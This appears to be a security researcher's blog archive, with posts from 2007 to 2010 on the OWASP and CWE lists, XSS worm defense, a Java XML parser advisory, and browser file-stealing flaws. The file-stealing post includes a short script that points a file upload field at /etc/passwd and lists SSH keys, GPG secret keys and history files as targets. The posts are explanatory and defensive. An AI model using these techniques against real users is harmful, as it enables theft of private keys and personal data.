OWASP Top Ten for 2010 Released

The OWASP Top Ten Project has released a final version of the Top Ten for 2010.

In this new version, the focus has shifted to become more risk oriented. There is less emphasis on "vulnerabilities" and a greater focus on identifying meaningful risk. Risk is identified by utilizing a methodology that explicitly calls out threat agents, attack vectors, weakness prevalence, technical impact and business impact.

For 2010, the OWASP Top 10 Web Application Security Risks are:

  • A1: Injection
  • A2: Cross-Site Scripting (XSS)
  • A3: Broken Authentication and Session Management
  • A4: Insecure Direct Object References
  • A5: Cross-Site Request Forgery (CSRF)
  • A6: Security Misconfiguration
  • A7: Insecure Cryptographic Storage
  • A8: Failure to Restrict URL Access
  • A9: Insufficient Transport Layer Protection
  • A10: Unvalidated Redirects and Forwards

The final document is available from:

Personally, I'm glad to see the return of a misconfiguration category (A6: Security Misconfiguration). This is a reprise of the old Insecure Configuration Management from the 2004 version. The failure to provide secure configurations is a more frequent problem than many people like to admit.

Posted by gfleischer on 2010/04/19 at 19:47 in Security

Top 25 Most Dangerous and Getting 'Threat Model' Terminology Correct

Today, the CWE - 2009 CWE/SANS Top 25 Most Dangerous Programming Errors list was released. These top twenty-five CWE entries represent the most important vulnerability categories that all application developers should be aware of. Think of it as a OWASP Top Ten that covers more than just web applications. The existing Common Weakness Enumeration is outstanding but overwhelming. By framing the programming errors in terms of a Top 25, these issues become instantly more accessible. In turn, this establishes a de-facto application security baseline.

What I found most refreshing was the proper use of the term 'Threat Model' in Appendix B: Threat Model for the Skilled, Determined Attacker. Too often the term has been abused by some people to label activities better described as vulnerability analysis or attack modeling. The proper focus of a threat model is the agent or actor that could exploit a vulnerability. It was extremely satisfying to see the threat model explicitly described when it is so often glossed over or ignored completely.

Posted by gfleischer on 2009/01/12 at 22:13 in Security

Cross-Site XHR Removed from Firefox 3

According to this Bugzilla entry, Bug 424923 - Remove Cross-Site XHR, the Cross-Site XMLHttpRequest (XHR) support has been removed from Mozilla Firefox 3. Mike Shaver made brief mention of this in his latest blog post.

I think this is good news overall. It just didn't seem that the whole concept of cross-site XHR was fully baked. Given the prevalence of cross-domain web attacks, waiting for the specification to settle is probably an excellent idea.

Posted by gfleischer on 2008/03/27 at 20:53 in Security

Mozilla Firefox 2.0.0.13 Released

Mozilla Firefox 2.0.0.13 has been released. See the release notes for more information.

There are security fixes for a couple of vulnerabilities that I was involved with:

I'll be posting some more information about these in the future.

Posted by gfleischer on 2008/03/25 at 22:19 in Security

An Architectural Approach to XSS Worm Defense

I've been wanting to post a follow-up to RSnake's XSS Worm Analysis And Defense paper, but I was waiting to see if anything else came of it. As I mentioned before, post-contest commentary has been extremely light. I find this very disheartening. The whole reason for the contest was to generate interest in creating XSS worms in order to better understand what effective anti-worm counter-measures could be developed. RSnake made this perfectly clear: the goal here is to understand why the propagation methods were chosen so we can build defenses against them. Unfortunately, it appears the sensationalism of the contest over-shadowed the ultimate goals.

But that doesn't mean there wasn't important progress made in understanding both how XSS worms could propagate and what can be done to prevent them. I posted the following comment as an attempt to drawn in all of the ideas in the paper:

So, let me see if I am understanding how this all ties together:
  • The website www.example.com is a social network site where users must log in to post content.
  • The www.example.com site has potential XSS vulnerabilities on every page.
  • There are two types of users that utilize the site: those with JavaScript enabled and those with JavaScript disabled. The users don't toggle JavaScript on and off as they use the site. Going from on to off, the site will not function; going from off to on, the user may be vulnerable to XSS attacks.
  • When a user first logs into www.example.com, the JavaScript status is detected (e.g., onsubmit form handler sets hidden form variable). The JavaScript status is associated with the user session.
  • A separate domain confirm.example.com is used to prompt users for confirmation of submitted content.
  • The confirm.example.com website is guaranteed to be free of XSS holes.
  • Any content submitted on www.example.com is posted directly to a confirmation page on confirm.example.com.
  • There is not a nonce used on www.example.com, because an XMLHttpRequest could read it if it was present and replay it.
  • Confirmation of content on confirm.example.com is only allowed via the POST method.
  • A nonce is used on POSTs from confirm.example.com to prevent blind CSRF attacks.
  • If the confirmation page detects that it has been framed, it should attempt to unframe itself. If this fails, submission of the form should not be allowed. If JavaScript is either not enabled or if on IE the "security=restricted" was set on the frame, this check will never be applied so additional logic compensates for it.
  • If user did not have JavaScript enabled when the user session was established, the form is constructed so that no JavaScript is required to submit it. If JavaScript is enabled, the form should not be submitted; this protects against the situation where the user started with JavaScript off and then turned it on, thus making himself vulnerable to attacks.
  • If the user had JavaScript enabled when the session was established, the confirm page should be constructed so that it only allows for submission when JavaScript is enabled (e.g., set method and action in onsubmit handler). This protects against the IE situation where "security=restricted" has been set on an frame. If JavaScript is no longer enabled, submission will fail.

The big caveat to all of this would be that the login process needs to be protected in a similar manner (e.g., use separate login.example.com domain, etc.).

Given some of the confusion, maybe RSnake's explanation in the paper wasn't clear enough for general consumption. For anyone that is involved with these types of issues, the paper presents a fresh take on many of the existing defensive techniques.

The approach can be condensed into the following main points:

  • use the same-origin policy as a choke-point
  • be smart about nonces
  • anti-framing should be JavaScript aware

The key insight is, that by using a separate domain which is strictly dedicated to confirmation of user submitted content, many of the XSS worm propagation techniques can be stymied. Any use of XMLHttpRequest to propagate the worm will be prevented when a separate domain is used (the Samy worm was able to propagate because it could switch domains). This leaves only blind CSRF attacks as a concern.

If that single domain can be guaranteed to be free of XSS holes, then a nonce can be used to prevent blind CSRF. But that nonce must be properly employed. If the nonce is available anywhere that can be read using JavaScript, then it could be replayed as part of the attack.

Finally, anti-framing approaches should be considered carefully. Because some users may not have JavaScript enabled (for accessibility reasons), a thoughtful approach is required to avoid causing those users excessive hardship. Internet Explorer can be forced to disable JavaScript in frames through the use of a restricted security policy. By analyzing the possible scenarios, appropriate application logic can be constructed that prevents these types of attacks while still making the website usable.

Of course, all of this depends on browsers being free of vulnerabilities. If web-browsers can be induced into violating the same-origin policy, many of these defenses begin to break down. In these cases, additional techniques are required to identify and stop XSS worms; this is still an area with open research questions.

But as RSnake shows in his paper, some simple architectural design decisions can be used to help prevent XSS worms from ever taking hold.

Posted by gfleischer on 2008/02/04 at 22:02 in Security

XML Vulnerability in SUN Java Runtime Environment

A couple of days ago, I noted the latest Sun Java Runtime Environment (JRE) update and the apparent lack of security advisories. Today, I saw that one was in fact released shortly after I posted about it.

The following advisory was posted, A Vulnerability in the Java Runtime Environment XML Parsing Code May Allow URL Resources to be Accessed, that describes a defect that allowed "external general entities" to be processed even when the processing had been disabled:

The Java Runtime Environment (JRE) by default allows external entity references to be processed. To turn off processing of external entity references, sites can set the "external general entities" property to FALSE. This property is provided since it may be possible to leverage the processing of external entity references to access certain URL resources (such as some files and web pages) or create a Denial of Service (DoS) condition on the system running the JRE. A defect in the JRE allows external entity references to be processed even when the "external general entities" property is set to FALSE.

The issue of external entity handling would mostly be a concern where one was accepting and parsing XML documents from untrusted sources. But given the prevalence of web-services that may rely on exchange of XML documents, this is probably a common situation. Anyone that was depending on feature being turned off is potentially at risk.

NOTE: By default, processing of external entities is turned ON.

The advisory states that to turn them off, the following feature should be set to false:

factory.setFeature("http://xml.org/sax/features/external-general-entities", false);

You can search for other disclosed JRE vulnerabilities on the Sun sites using the search: "Vulnerability Java Runtime Environment".

Posted by gfleischer on 2008/02/01 at 11:24 in Security

Disclosure Truly is Dead

According to this eWeek article, Caught in a (Real) Security Bind, RealNetworks is unable to get information on the RealPlayer 11 vulnerability currently being offered by Gleg as part of their VulnDisco pack.

In a quote attributed to Chad Dougherty of Carnegie Mellon's CERT/CC:

We'd like to see the issue get fixed. We don't get into the politics of disclosure. Our objective is to get the information flowing in a way that end users are protected.

The sense of futility reminded me of Jeremiah Grossman's article Businesses must realize that full disclosure is dead. In it, he makes the following spot on observation:

While ethics, morals, and professionalism should always be fundamental tenants of how professionals conduct themselves, it's irresponsible to design security strategies based on the assumption people will be. Business owners and software vendors have a responsibility for the data they protect and the products they sell. They must take into consideration the environment around them, understand that it's hostile, and be pragmatic in their approach. Have no expectation that anyone is going to share any vulnerability information ahead of time. Pray they will before going public, but do not depend on it and frankly, it's hopeless to demand it.

Vendors need to recognize that conducting proactive vulnerability research into their own products must be an integral part of the software development lifecycle. Find the vulnerabilities before someone else does. That has become the only way to stay ahead.

Posted by gfleischer on 2008/01/31 at 20:07 in Security

Jeff Jones, Manufactured Controversy, and Yes, the SDL Works

Jeff Jones has recently released a new paper comparing vulnerability counts for Windows Vista in the first year with the equivalent time frame for Windows XP. The results are that the Vista had fewer vulnerabilities in the first year than Windows XP did. Somehow that is not surprising given that XP was released prior to implementation of the Security Development Lifecyle (SDL).

In fact, if the vulnerability counts in Vista weren't significantly less, the SDL would have been declared an abysmal failure and the Microsoft security employees would have slinked off meekly into the night. But this didn't happen and that is a good thing. It lends credence to the idea that well structured security software engineering and development processes work in reducing the total number of vulnerabilities.

Of course, after Jones' previous stinker of a paper (which I discussed here), there was bound to be controversy. You can watch the piling on in the usual places (ZDNet or Slashdot). There are the usual arguments about counts, methodologies and rhyming apple with orange. Trolling and flamebait at its finest. Fanbois and zealots arise.

But all of this serves to cloud the real issue. The comparisons between Windows, the Linux versions and Mac OS X aren't getting to the core of the problem. They are simply a distraction. Most people don't stand there pondering which operating system to buy, because it may be more secure. The choice of operating system has already been made for them. For most people, it is going to be some OEM version of Windows.

So maybe a more appropriate question to pose is, if one has to purchase a computer to run Windows, should it be Windows XP SP2 or Vista? That is where the Jones paper fails to reach its full potential. Comparing an outdated, unsupported Windows XP release with Vista and at the same time comparing Vista with Linux and Mac OS X just confuses the issue of assigning some sort of "best security" mantle.

There is significant value to be found in Jones' paper if it is read dispassionately. He has promised a more interesting work that includes the Days-of-Risk (DoR) metric for the products. Personally, I am looking forward to it, because it should help clarify how much exposure an individual user had to a given vulnerability. Unfixed vulnerabilities (not undiscovered vulnerabilities) are the basis for most risk faced by users.

I hope the DoR metrics are enlightening, because a careful reading of the side-by-side comparisons showed that Ubuntu LTS (reduced) had the fewest number of unfixed vulnerabilities in the first year. I find that to be an intriguing discrepancy among the other conclusions of Windows Vista security superiority.

Posted by gfleischer on 2008/01/24 at 13:50 in Security

XSS Vulnerabilities Can Be Used to Hack Servers

Recently there has been some controversy surrounding ScanAlert's HackerSafe program with respect to its position on sites with XSS (cross-site scripting). This Information Week article gives the background. Essentially, ScanAlert believes that XSS vulnerabilities are only a threat to clients and/or their web browser.

In the article, the following statement is made:

Pierini maintains that XSS vulnerabilities aren't material to a site's certification. "Cross-site scripting can't be used to hack a server," he said. "You may be able to do other things with it. You may be able to do things that affect the end-user or the client. But the customer data protected with the server, in the database, isn't going to be compromised by a cross-site scripting attack, not directly."

Claiming that XSS can't be used to hack a server is just a semantic distinction. Of course, ScanAlert has to take that position otherwise they would appear to selling snake-oil site protection. I'm not passing any judgement on ScanAlert's mindset, but I would like to point out the XSS can be used to hack servers.

Any web-browser based attack that could be launched by an attacker could be re-packaged as a XSS scripting payload. Here are a few possible examples of using XSS to attack a server:

  • Brute-force login credentials
  • Server port-scanning
  • Data retrieval through SQL injection (SQLI)

When a user visits the site, the XSS script payload would be launched and run in the context of the original site. Obviously, the same origin protections allow the user's browser to connect back to the site, communicate with it via XMLHttpRequest, and potentially establish Java network sockets using LiveConnect. Clearly, these are all attacks against the server.

An attacker could remain extremely stealthy while conducting reconnaissance or attacking the server. By using many individual client web browsers as attack agents, the attacker never needs to connect to the site directly. With the addition of a third-party command and control site to coordinate across many clients, a user's web browser could be used to scan a single port on the server, attempt to login with a few user-names or passwords, or retrieve a single row from the database using SQLI.

The reconnaissance or attack may go completely unnoticed, because by distributing the activity across a wide number of clients, it has been spread out both in time and space. It would appear as a bunch of little, organic attacks not as a big, coordinated one. Heuristic based IDS, IPS or DLP protections may never fire if the attack is subtle enough.

These aren't any new ideas (see "10 Quick Facts..." in this paper). Really these are the same old XSS attacks against LAN clients, but targeting the originating server instead. Just something to keep in mind when someone claims XSS can't be used to hack a server.

And for more excellent commentary see Jeremiah Grossman's comments as well as Jericho's (from attrition.org).

Posted by gfleischer on 2008/01/21 at 22:39 in Security

Web Browser File Stealing Vulnerabilities Are Important

File stealing vulnerabilities have long held a special place in web browser exploitation. Web browsers attempt to carefully sandbox content to avoid interaction with the local file-system. But INPUT elements with TYPE=FILE are specifically designed to bypass the sandbox to allow users to select files for upload. For miscreants, this provides the opportunity to steal files from unsuspecting users. By exploiting web browser vulnerabilities, malicious web pages may be able to steal confidential information by manipulating the FILE input element and causing arbitrary files to be uploaded. These types of attacks are old and well known.

There are a few main modes of attack.

  • Purely technical attacks: The purely technical attack involves exploiting a vulnerability to directly set the file input's VALUE field to a chosen, arbitrary value. For example, create a input element of type TEXT, set the value, and then change the type to FILE:
    <script>
        var input0 = document.createElement("input");
        input0.type = "text";
        input0.value = "/etc/passwd";
        input0.type = "file";
    </script>
    
    Other attacks have involved direct DOM manipulations. These types of vulnerabilities are now extremely rare, because the file input types enjoy additional protections in most modern web browsers.
  • Social engineering attacks: The social engineering attack usually involves getting the user to type the complete path to the file into the input element. To increase the chance of success, Cascading Style-sheets (CSS) are used to style the input to appear more like a text element or textarea or to overlay it with some other element.
  • Hybrid attacks: The hybrid attack combines aspects of the technical attack with elements of the social engineering attack. These attacks are typically performed by selectively capturing keystrokes in the file input's text entry field. There have been a couple of methods used to facilitate this type of attack. The first involves silently redirecting keystrokes from another input element into the file input. The second method sets the focus on the file input element and simulates keystrokes into another input element. In both methods, CSS can be used to obscure that the user's data is being sent to the file input element.

Depending on the attacker's goals, well-known files may be targeted. For example, on Linux or Mac OS X some security related files are juicy targets:

  • ~/.gnupg/secring.gpg
  • ~/.ssh/id_rsa

Or, maybe one of the history files:

  • ~/.bash_history
  • ~/.lesshst
  • ~/.mysql_history
  • ~/.scapy_history
  • ~/.viminfo

Even simple files like "C:\boot.ini", "/etc/passwd" or "/etc/hosts" can show information about the system that the owner may not want revealed. For example, acquiring one or more of these files from a Tor user could be used to fingerprint the machine or reveal the user's actual identity.

The way that people use their web browsers with the Internet has changed over the last several years. The level of web browser interaction has drastically increased. Normal people are writing blog entries, posting comments on their friend's sites and composing business documents using online services. This is a huge shift from the "punch the monkey" mouse clicking of the early years. That increased level of interaction is what makes the hybrid attacks so significant. Users are accustomed to typing into web forms and responding to captchas. Vulnerabilities that allow redirecting of the focus to the file input field should be taken seriously.

File stealing through manipulation of the file input can be extremely insidious. Users truly depend on their web browser to protect them. So, among the major browsers, what can users expect?

Mozilla's efforts with Firefox are finally beginning to pay off. Firefox 3 completely removes the text entry portion of the file input and replaces it with a graphic file picker. The last several Firefox 2 releases are slowly addressing the ability to selectively set the focus on the text portion of the file input element.

Safari has used a file picker for a long time and avoided the whole focus and captured keystroke problem.

Microsoft Internet Explorer has lagged behind in these fixes. Although it isn't entirely clear what changes IE8 will bring, both IE6 and IE7 continue to exhibit some of the classic focus vulnerabilities. Although these vulnerabilities have been repeatedly publicly disclosed over the last couple of years, IE has not been updated to address any of them.

To close out the year, I'll post some demonstrations of how these IE file stealing vulnerabilities can be exploited. Stay tuned.

Posted by gfleischer on 2007/12/20 at 21:33 in Security


Subscribe
RSS 2.0
Quick Links
Content
Info

Categories
Archives
Sitemap
Valid XHTML 1.0 Transitional Valid CSS!